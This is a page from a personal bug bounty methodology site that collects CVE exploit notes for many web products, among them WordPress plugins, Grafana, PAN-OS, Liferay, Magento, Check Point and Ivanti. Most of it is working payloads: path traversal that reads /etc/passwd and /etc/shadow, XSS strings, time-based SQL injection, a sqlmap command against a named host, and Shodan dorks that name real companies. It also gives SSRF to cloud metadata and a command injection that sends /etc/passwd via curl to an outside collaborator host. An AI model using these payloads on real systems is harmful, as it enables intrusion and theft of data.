My Bug Bounty Methodology
search
⌘Ctrlk
My Bug Bounty Methodology
  • Active Directory Hacking
  • Page 4
  • Helping Tools
  • Burp Manual Testing
  • XSS
  • Open Redirect
  • SQL injection
  • Local file inclusion (LFI)
  • Web Security Testing Checklist
  • My Concept
    • globe-pointerGoogle Dorking
    • globe-pointerGoogle Dorking
    • globe-pointerGitHub Dorking
    • Find Backup Files
    • bugBugs Chains
    • 💰subfear.sh
    • 🔺Shodan Queries
      • 💎My CVE Approach
        • CVE-2025-29927 Nginx + Next.js Middleware Bypass
        • Ninja Tables <4.1.9 - Unauthenticated Arbitrary File Read [LFI]
      • 💚Create a Python POC Script
      • 💙Default Credentials
    • bugBugs
    • Config Api-keys and Tokens
    • HaE extension with regular expressions regex
  • Time Based SQL Injection
  • androidAndroid Pentesting
  • appleOIS Pentesting
  • globe-pointerWEB Pentesting
  • chart-scatter-3dAD Pentesting
  • Cloud Pentesting
  • sketchAPI Traning
  • Page 3
  • 🇵🇰XSS & Open Redirect
  • graduation-capVU QUIZ, Assignment, Lectures
  • Mid Datasheet
  • My Bash & Python Scripts
  • 💎My methodology
  • My Nuclei templates
  • 3My Hunting Approach on Login
  • Page
  • 4Find LFI and Path Traversal
  • 5My Hunting Approach on File Upload
  • volleyballMy Hunting Approach Step-2
  • 🔍Google Dork Recon
  • flag-pennantInjection Pentest POC
  • flag-pennantInformation Disclosure POC
  • flag-pennantOpen Redirect POC
  • flag-pennantHTML injection POC
  • flag-pennantSQL injection POC
  • flag-pennantReflected XSS POC
  • flag-pennantSSTI Injection POC
  • flag-pennantImproper Access Control
  • flag-pennantDOM XSS POC
  • flag-pennantStored XSS POC
  • flag-pennantSSRF POC
  • flag-pennantLFI POC
  • flag-pennantRFI POC
  • flag-pennantBackup file Exposed
  • flag-pennantEmail Spoofing
  • 👑Find Subdomains
  • 🔥Improper Access Control - Generic (CWE-284)
  • 📧NO RATE LIMIT
  • ™️HTML Injection (CWE-79)
  • 💥Open Redirect (CWE-601)
  • ⭐CSRF
  • 💎Command Injection
  • 💸Server Side Request Forgery (SSRF)
  • 😎Local File Inclusion (LFI)
  • 💳File Upload Vulnerabilities
  • 💰Code Injection (RCE)
  • 🕯️IDOR TO Account Takeover
  • 🤠Business Logic Errors
  • 🤩Api Testing
  • 💉My Open Redirect Methodology
  • 🏍️My XXE Methodology
  • 📍Subdomain Takeover
  • 😎WorldPress Testing
  • ⚡Tools Setup
  • 😍CVE Exploit
  • 💯WAF or Cloudflare Bypass
  • 🏁My Synack Report Methodology
  • Create Custom Nuclei Templatearrow-up-right
  • 🏳️One-Liners For Bug Hunting
  • All Bug Exploit Notesarrow-up-right
  • eWPTXv3
  • Bug Hunter Handbookarrow-up-right
  • 📱Android Pentesting
  • Job Interview Questions
  • My Target: Web.comarrow-up-right
  • xss 1
  • sqliarrow-up-right
  • 🧠Impacts of Bugs
  • Facet Analysis
  • Traffic from WSL to Burp Suite
gitbookPowered by GitBook
block-quoteOn this pagechevron-down
  1. My Conceptchevron-right
  2. 🔺Shodan Queries

💎My CVE Approach

LogoHackerOneHackerOnechevron-right
LogoGitHub - nomi-sec/PoC-in-GitHub: 📡 PoC auto collect from GitHub. ⚠️ Be careful Malware.GitHubchevron-right
LogoGitHub - DarkFunct/TK-CVE-Repo: TK-CVE-RepoGitHubchevron-right
LogoFriends-Of-Presta Security AdvisoriesFriends-Of-Presta Security Advisorieschevron-right

hashtag
WordPress and Plugings CVE

1

hashtag
CMS Technology Based CVE

2

hashtag
Web Framework Based CVE

3

hashtag
Web Framework Based CVE

4

hashtag
Wayback URL Grep CVE

5

hashtag
Shodan search CVE

PreviousShodan Querieschevron-leftNextCVE-2025-29927 Nginx + Next.js Middleware Bypasschevron-right

Last updated 1 month ago

  • WordPress and Plugings CVE
  • CMS Technology Based CVE
  • Web Framework Based CVE
  • Web Framework Based CVE
  • Wayback URL Grep CVE
  • Shodan search CVE
WooCommerce plugin allows LFI! 

02: Capture request in Burp

03: Change request method to POST and add:

POST /wp-admin/admin-ajax.php?template=../../../../../../../etc/passwd&value=a&min_symbols=1

04: Also add:

action=woof_text_search&

05: That’s it! You got local files.
-------------------------------------------------




Tomcat: /manager/tomcat /..;/

Drupal CMS:
/core/install.php
/install.php
Admin panel takeover
POC: cat ip.txt | while read host; do  for path in /install.php /core/install.php; do   echo "$host$path";  done; done | httpx -mc 200 -sc -cl -title | grep "Choose language"

Prestashop CMS module
POC: curl -v 'https://localhost/modules/appagebuilder/apajax.php?leoajax=1&product_manufacture=1,1)+or+sleep(4)%23--'
https://security.friendsofpresta.org/modules/2023/01/05/appagebuilder.html

Liferay CMS Portal RXSS - CVE-2025–4388 
https://medium.com/@tsxninja2004/rxss-on-mercedes-benz-71a839da2d31
Shodan: Hostname:"nokia.com"  html:"liferayPortalCSS"
Exploit URL: /o/marketplace-app-manager-web/icon.jsp?iconURL=https:///%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E

Liferay Portal/DXP Reflected XSS in Blogs Web - CVE-2025-4576
template: https://github.com/projectdiscovery/nuclei-templates/issues/12862
Shodan: Hostname:"nokia.com"  html:"liferayPortalCSS"
Exploit URL: /o/blogs-web/blogs/entry_cover_image_caption.jsp?coverImageCaption=%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E"

Palo Alto Networks PAN‑OS - (XSS) vulnerability - CVE-2025–0133 
https://ch4ndan.medium.com/how-i-found-xss-cve-2025-0133-using-shodan-39a37eae7807
Shodan: hostname:target.com os:"PAN-OS"
Exploit URL: /ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer

Palo Alto Networks PAN-OS: OS Command Injection in GlobalProtect - CVE-2024-3400
https://github.com/schooldropout1337/CVE-2024-3400/blob/main/CVE20243400.yaml

Grafana Path Traversal - CVE-2025-4123 
https://github.com/ynsmroztas/CVE-2025-4123-Exploit-Tool-Grafana-
POC:
Open Redirect URL: http://103.175.2.234:30000/public/..%2F%5Cevil.com%2F%3f%2F..%2F..
SSRF URL: http://103.175.2.234:30000/public/..%2F%5C169.254.169.254/latest/meta-data/%2F%3f%2F..%2F..
[LFI URL:  http://103.175.2.234:30000/public/..%2F%5coast.pro%2F%3f%2F..%2F..%2F..%2Fetc%2Fpasswd
XSS URL:  http:
//103.175.2.234:30000/public/%3Cscript%3Ealert('mitsec')%3C%2Fscript%3E

Magento CMS - SQL injection -CVE-2019-8130
https://pentest-tools.com/blog/exploiting-sql-injection-in-magento-with-sqlmap
sqlmap -u 'http://db.novapay.com:8080/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=' -p "ids[0][product_id][to]" --prefix=")))" --suffix=" -- -" --technique=BT --ignore-code=400 --level=5 --risk=3  --no-cast  --batch

Minio Console - CVE-2023-28432
https://github.com/acheiii/CVE-2023-28432
POC:
POST /minio/bootstrap/v1/verify HTTP/1.1

Typo3 CMS: ?type=* parameter is vulnerable to SQL
Payload ; -1+OR+3 AND if(now()=sysdate(),SLEEP(9),0)-- wXyW2 AND if(now()=sysdate(),SLEEP(9),0)-- wXyW1=6 +AND+000762=000762

wordpress CMS:
https://github.com/m3ssap0/wordpress-really-simple-security-authn-bypass-exploit

Mura CMS:
https://github.com/Stuub/CVE-2024-32640-SQLI-MuraCMS?tab=readme-ov-file

Adobe Experience Manager:
1): Bug: Unauthorized Access to Adobe AEM CRX Namespace Editor
access control vulnerability was found in Adobe Experience Manager where the endpoint 
/crx/explorer/ui/namespace_editor.jsp 
allowed unauthenticated users to access and modify namespace entries within the CRX (Content Repository Extreme) Explorer.

2): XSS to childlist selector in AEM POC:
/sdfsdf.childrenlist.html
/sdfsdf.childrenlist.sdfsdf.html  
/xx<a href="javascript:prompt(document%2edomain)">aaaa.childrenlist.html
/seguros/especialidades/"><img src=a onerror=alert(document.domain)>.childrenlist.html
/etc/designs/xh1x.childrenlist.json//<img src=x onerror=alert(origin)>.html
/xh1x.childrenlist.json//%3Csvg%20onload=alert('XSS')%3E.htmlxx/etc/designs/xh1x.childrenlist.json
Adobe ColdFusion:
1): Access Control Bypass
/restplay
Adobe ColdFusion:
1): Access Control Bypass
/restplay
/CFIDE/restplay
/CFIDE/administrator
/CFIDE/adminapi
/CFIDE/main
/CFIDE/componentutils
/CFIDE/wizards
/CFIDE/servermanager
2): Reflected XSS
/asad"><img src=a onerror=alert(document.domain)>/..CFIDE/administrator/index.cfm
cPanel RXSS CVE-2023-29489
/cpanelwebcall/<img src=x onerror="prompt(1)">aaaaaaaaaaaa

------------
JIRA Information Disclosure Endpoint:
cat endpoint.txt | grep "secure" | grep "jspa"
cat endpoint.txt | grep "jira"
Endpoint: /secure/QueryComponent!Default.jspa
------------
CVE-2023-25157 - GeoServer SQL Injection
https://github.com/win3zz/CVE-2023-25157
cat endpoint.txt | grep '/geoserver/ows/'
geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=layername&CQL_FILTER=1=1;SELECT version()--

------------
SQL Injection
cat endpoint.txt | grep '?id='
Payload : if(now()=sysdate(),SLEEP(8),0)

------------
GANGLIA RXSS:
cat endpoint.txt | grep ganglia 
cat endpoint.txt | grep graph_all_periods.php
Vulnerable Parameter: h
Payload: ')"><img src=0 onerror=prompt();>

------------
Keycloak Endpoint
Keycloak 10.0.0 to 18.0.0 have a POST based XSS vulnerability at the endpoints
/auth/realms/master/clients-registrations/default
/auth/realms/master/clients-registrations/openid-connect
/realms/master/clients-registrations/default
/realms/master/clients-registrations/openid-connect

cat endpoint.txt | grep "keycloak"
cat endpoint.txt | grep "/realms/master"
CVE-2024-24919 LFI - Path terversal
shodan http.html:"Check Point ssl network" ssl:"target"
POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

====================================
IVANTI 
shodan title:"Ivanti Connect" hostname:"target.*"
Poc: https :// [ivanti-ip/domain]/api/v1/license/keys-status/;curl -X POST -d @/etc/passwd oastify[.]xxxxx
https://github.com/h4x0r-dz/CVE-2024-21893.py

====================================
CVE-2024-27348 (RCE) - 
Unauth users can execute commands via Groovy injection 
in Apache HugeGraph-Server.
Fix: Upgrade to version 1.3.0
POC: https://github.com/Zeyad-Azima/CVE-2024-27348
FOFA: app="HugeGraph-Studio"
SHODAN: http.title:"HugeGraph"